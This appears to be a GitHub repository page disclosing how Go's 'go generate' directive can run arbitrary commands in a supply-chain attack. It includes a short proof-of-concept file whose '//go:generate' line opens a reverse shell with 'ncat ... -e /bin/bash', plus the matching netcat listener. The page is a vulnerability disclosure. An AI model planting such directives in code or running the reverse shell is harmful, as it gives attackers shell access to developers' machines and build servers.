/golang-RCE-0day-POC

golang RCE 0day POC

Apache License 2.0Apache-2.0

Tweet Follow on Twitter GitHub Followers Top Langs

golang-RCE-0day-POC

golang RCE 0day POC

see

https://twitter.com/Hktalent3135773/status/1508635999030571008

https://hackerone.com/reports/1525100

golang/go#52059

It was officially allowed, so it was made public

https://issuetracker.google.com/issues/227263888 Maybe it's not a bug, it's the expected behavior, but it's the way of RCE(Remote Command Execution) attack in the supply chain The go generate command does not conduct security check. When compiling the associated malicious library and code, it may cause the execution of the "//go:generate [malicious command]"

Impact

1、hacker run

nc -lv 4444

2、POC

testRce.go
Code 152 BytesWrap lines Copy Download
package main

import (
       "fmt"
)
//go:generate ncat 127.0.0.1 4444 -e /bin/bash
func main() {
fmt.Println("test go:generate remote command execution ")
}

3、run build

go generate -x testRce.go

4、test command execution

in "nc -lv 4444" console

Attack scenario: People who provide golang open source libraries and projects may embed malicious commands, causing users to trigger commands during compilatio 2022-03-29 10 12 06

受害者

  • Golang developer
  • Golang open source automatic compilation integration server